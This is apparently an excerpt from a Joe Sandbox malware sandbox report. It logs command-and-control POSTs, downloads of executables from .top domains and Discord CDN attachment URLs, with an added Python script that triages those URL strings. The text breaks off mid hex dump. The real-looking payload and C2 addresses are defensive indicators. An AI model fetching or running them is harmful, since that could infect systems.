Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ombhsev.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 170Host: 193.56.146.214
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 127Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://193.56.146.214/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 423Host: 193.56.146.214
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 201Host: nusurtal4f.net
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: RTCOMM-ASRU
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 81.177.141.36
Source: Joe Sandbox View IP Address: 193.56.146.214
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.7:49844 -> 93.115.20.139:28978
Source: 86B8.exe.7.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: 86B8.exe.7.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: 8746.exe.7.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: AdvancedRun.exe.31.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: 86B8.exe.7.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: 86B8.exe.7.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: 8746.exe.7.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: 86B8.exe.7.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: 8746.exe.7.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: 86B8.exe.7.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 86B8.exe.7.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: 8746.exe.7.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: AdvancedRun.exe.31.dr String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: 86B8.exe.7.dr String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: 5D4.exe.7.dr String found in binary or memory: http://fontello.com
Source: 86B8.exe.7.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: 86B8.exe.7.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: 8746.exe.7.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: 86B8.exe.7.dr String found in binary or memory: http://ocsp.sectigo.com0
Source: 319A.exe, 0000001F.00000000.402921525.0000000000D52000.00000002.00020000.sdmp, 319A.exe.7.dr String found in binary or memory: http://tempuri.org/DetailsDataSet1.xsd
Source: explorer.exe, 00000007.00000000.296667316.0000000006840000.00000004.00000001.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: 8746.exe.7.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: AdvancedRun.exe, AdvancedRun.exe, 00000023.00000002.433249054.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002A.00000000.454048622.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.31.dr String found in binary or memory: http://www.nirsoft.net/
Source: sqlite3.dll.36.dr String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: 1xVPfvJcrg.36.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 319A.exe, 0000001F.00000000.402921525.0000000000D52000.00000002.00020000.sdmp, 319A.exe.7.dr String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/902526114763767818/A623D0D3.jpg
Source: 319A.exe, 0000001F.00000000.402921525.0000000000D52000.00000002.00020000.sdmp, 319A.exe.7.dr String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/902526117016109056/AB0F9338.jpg
Source: 8746.exe.7.dr String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903196811345395712/6058E8D5.jpg
Source: EDD.exe, 0000001C.00000000.384142005.0000000000812000.00000002.00020000.sdmp, EDD.exe.7.dr String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903333369742491648/1E88D378.jpg
Source: 5D4.exe.7.dr String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903575517888925756/6D9E3C88.jpg
Source: 5D4.exe.7.dr String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903575519373697084/F83CB811.jpg
Source: 89D7.exe.7.dr String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903580013041967104/06ED9A1B.jpg
Source: 89D7.exe.7.dr String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903580015046828032/039F9A54.jpg
Source: 89D7.exe.7.dr String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903580017093660692/A303D181.jpg
Source: 89D7.exe.7.dr String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903580019203387432/930B55FC.jpg
Source: 1xVPfvJcrg.36.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 1xVPfvJcrg.36.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 1xVPfvJcrg.36.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 1xVPfvJcrg.36.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 1xVPfvJcrg.36.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 1xVPfvJcrg.36.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: AdvancedRun.exe.31.dr String found in binary or memory: https://sectigo.com/CPS0C
Source: 86B8.exe.7.dr String found in binary or memory: https://sectigo.com/CPS0D
Source: 86B8.exe.7.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: 1xVPfvJcrg.36.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
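The URL strings above mix three kinds of evidence that deserve different handling. The digicert/sectigo entries are the AIA, CRL, OCSP and CPS pointers every Authenticode-signed binary carries in its certificate chain; they are noise, and they arrive with a stray DER byte glued onto the end ("RootCA.crl0O", "ocsp.digicert.com0C"). The duckduckgo/yahoo/ecosia/google entries in 1xVPfvJcrg.36.dr look like a browser's search-provider table rather than attacker infrastructure. The cdn.discordapp.com attachment URLs found in the .NET droppers (319A.exe, EDD.exe, 5D4.exe, 89D7.exe, 8746.exe) are the ones worth pulling. The script below is an added example, not part of the Joe Sandbox report: it parses a handful of lines copied from the report, strips the DER tail with a deliberately narrow heuristic (only after .crl/.crt, /CPS or a bare .com host, so a host such as privacytoolzforyou-6000.top is never touched), and groups the cleaned URLs by dropped file. The category names, the search-host list and the DER-tail rule are my assumptions, not something the report defines.

```python
"""Triage of 'String found in binary or memory' URL lines from a Joe Sandbox report.

Added example. Separates certificate-chain URLs (noise from signed binaries),
browser search-provider URLs, and third-party file hosting (here Discord CDN
attachments) so that only the last group is treated as a download source.
"""
import re
from collections import defaultdict
from urllib.parse import urlparse

LINE_RE = re.compile(r"^Source: (?P<src>.+?) String found in binary or memory: (?P<url>\S+)")
# Strip the byte that follows a URL pulled out of DER-encoded certificate data.
# Heuristic (assumption): only after suffixes that end a PKI URL, never elsewhere.
DER_TAIL_RE = re.compile(r"(\.(?:crl|crt)|/CPS|\.com)0[0-9A-Za-z#:]?$")
PKI_HOST_RE = re.compile(r"^(?:cacerts|crl\d*|crt|ocsp)\.")
# Assumption: search hosts seen in the report; extend from the browser's prepopulated list.
SEARCH_HOSTS = {"duckduckgo.com", "search.yahoo.com", "ac.ecosia.org",
                "cdn.ecosia.org", "www.google.com"}

# Lines copied verbatim from the report above (a representative subset).
REPORT_LINES = (
    "Source: 86B8.exe.7.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0",
    "Source: AdvancedRun.exe.31.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s",
    "Source: 86B8.exe.7.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O",
    "Source: 86B8.exe.7.dr String found in binary or memory: http://ocsp.digicert.com0C",
    "Source: 86B8.exe.7.dr String found in binary or memory: https://www.digicert.com/CPS0",
    "Source: AdvancedRun.exe.31.dr String found in binary or memory: https://sectigo.com/CPS0C",
    "Source: 319A.exe, 0000001F.00000000.402921525.0000000000D52000.00000002.00020000.sdmp, 319A.exe.7.dr String found in binary or memory: http://tempuri.org/DetailsDataSet1.xsd",
    "Source: 319A.exe, 0000001F.00000000.402921525.0000000000D52000.00000002.00020000.sdmp, 319A.exe.7.dr String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/902526114763767818/A623D0D3.jpg",
    "Source: 89D7.exe.7.dr String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903580013041967104/06ED9A1B.jpg",
    "Source: 89D7.exe.7.dr String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903580015046828032/039F9A54.jpg",
    "Source: 1xVPfvJcrg.36.dr String found in binary or memory: https://duckduckgo.com/ac/?q=",
    "Source: sqlite3.dll.36.dr String found in binary or memory: http://www.sqlite.org/copyright.html.",
)


def clean_url(url: str) -> str:
    """'...RootCA.crl0O' -> '...RootCA.crl'; URLs without a DER tail are returned unchanged."""
    return DER_TAIL_RE.sub(r"\1", url)


def normalise_source(src: str) -> str:
    """'319A.exe, 0000001F...sdmp, 319A.exe.7.dr' -> '319A.exe'; '86B8.exe.7.dr' -> '86B8.exe'."""
    first = src.split(",")[0].strip()
    return re.sub(r"\.\d+\.dr$", "", first)


def classify(url: str) -> str:
    """Bucket a cleaned URL: 'pki', 'file-hosting', 'browser-search' or 'other'."""
    u = urlparse(url)
    host = u.hostname or ""
    if PKI_HOST_RE.match(host) or u.path.endswith("/CPS"):
        return "pki"
    if host == "cdn.discordapp.com" and u.path.startswith("/attachments/"):
        return "file-hosting"
    if host in SEARCH_HOSTS:
        return "browser-search"
    return "other"


def triage_strings(lines) -> dict:
    """Map dropped-file name -> {category: [cleaned urls]} for every parseable line."""
    out = defaultdict(lambda: defaultdict(list))
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a string-found line; skip silently
        url = clean_url(m["url"])
        out[normalise_source(m["src"])][classify(url)].append(url)
    return {src: dict(cats) for src, cats in out.items()}


def download_sources(lines) -> dict:
    """Per dropped binary, only the file-hosting URLs an analyst should actually fetch."""
    return {src: cats["file-hosting"]
            for src, cats in triage_strings(lines).items() if "file-hosting" in cats}


if __name__ == "__main__":
    for src, cats in sorted(triage_strings(REPORT_LINES).items()):
        print(src, {k: len(v) for k, v in cats.items()})
    print("fetch:", download_sources(REPORT_LINES))
```

On the lines copied here the grouping leaves 86B8.exe and AdvancedRun.exe with nothing but PKI pointers (both are signed, AdvancedRun.exe being the NirSoft tool), and narrows the download follow-up to the Discord attachments referenced by 319A.exe and 89D7.exe.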
Source: unknown DNS traffic detected: queries for: xacokuo8.top
Source: global traffic HTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytoolzforyou-6000.top
Source: global traffic HTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sysaheu90.top
Source: global traffic HTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: toptelete.top
Source: global traffic HTTP traffic detected: GET //l/f/9Z2CynwB3dP17SpzOnMI/9f3868956801fb92fa090557a1edc6020dc838a9 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.181
Source: global traffic HTTP traffic detected: GET /dl/buildz.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: znpst.top
Source: global traffic HTTP traffic detected: GET //l/f/9Z2CynwB3dP17SpzOnMI/7af57f772c6107cc1c44807ee6e54627588ad2f9 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.181
Source: global traffic HTTP traffic detected: GET //l/f/_51AzHwB3dP17SpzL5Xz/3c5ef2028f9a45f85119eb6cb39f21b264b252bf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.181
Source: global traffic HTTP traffic detected: GET //l/f/_51AzHwB3dP17SpzL5Xz/3fa38023efb6f7516e4aff23353cd7c666085597 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.181
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49833
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:29:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 14 00 00 00 7b fa f1 1c b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:29:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 0b a2 13 cc 7b b8 43 12 c2 55 a1 b9 67 f4 25 45 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OOj{CUg%EQAc}yc0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:29:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:29:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 93 d6 10 49 3a 40 a8 e8 dd e1 fd 5f f7 4d 91 71 b2 42 4a 84 4b f4 f1 2c 89 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:@_MqBJK,0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:30:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:30:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:30:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c d8 21 bd 40 8f 8c f5 cf 9b 2b 25 9b f6 ba e9 1a b0 1c 67 74 d2 23 9f 87 cd 2b 80 78 51 a1 a2 8f 3c 08 d8 1c e0 32 02 50 08 08 d0 e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1f 27 f4 d2 af 34 91 b4 b9 81 8a 20 59 55 11 5c b8 e6 6e ab 49 11 a0 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 81 ff cc 8a 40 d8 06 0e 45 87 1b 7d 87 f8 e0 04 89 f9 d4 57 80 90 70 89 ec 30 4d 6b 0e e1 a2 22 48 12 da 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 d3 e2 5f 96 da 19 d1 3a 2d 6e 44 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 99 84 4a 04 38 2d 77 14 2c d0 e8 b1 14 b9 76 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 e2 49 64 cd 25 5c 8d b7 73 24 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 f5 07 b2 be 34 56 9b 46 76 99 86 11 00 83 32 42 62 6f c9 ae 88 3b 95 36 e1 48 50 67 79 50 b8 81 be e6 81 de e3 75 6d 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 
57 25 f5 b8 d0 a7 df f2 4a 0b 7d 54 7a 9c 6c 39 c0 a1 0c 5c 19 d6 63 95 be 07 3d da 9a 7e 05 22 7d e6 b2 68 60 b9 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 7b 88 4b 2e 69 81 77 af 5d c6 83 41 69 2f 14 b6 e8 95 19 6d 76 d6 60 83 70 56 3e 0f 60 7c aa 9f 50 54 0c f3 a6 eb 5a ed 33 bd 8a f1 7a 5b b4 18 20 5e 7a 14 f7 f2 26 2b e9 c4 ef 28 e8 98 eb e7 6c ba 25 8f fc da 14 79 a2 8e b9 08 90 bb 77 c6 19 2a 16 bf 43 b3 ea 3d b2 13 3b 35 02 1a 1b eb 22 f5 4e ad e8 16 83 83 6f d4 ed 3f ec c9 81 68 73 02 99 ea fc cd c3 05 d0 93 d3 23 39 01 c4 a5 c8 63 77 da 0b af bd d9 39 69 a1 99 9c 77 e8 0f 4e 8c da 06 b9 37 87 8c b4 26 b8 2c 58 32 77 6c 08 da f9 d2 eb 48 25 66 37 2d 2f f2 5e a5 27 48 84 89 ff 67 37 f9 bd a1 97 2b 86 f3 bd 98 bb 1f 77 c7 26 e1 39 c6 86 8e f0 09 af 63 9d 31 09 a8 50 13 30 7b 32 8c c9 e1 d5 c0 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 f8 3f d8 2c eb 53 43 ae 3b 97 e4 23 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
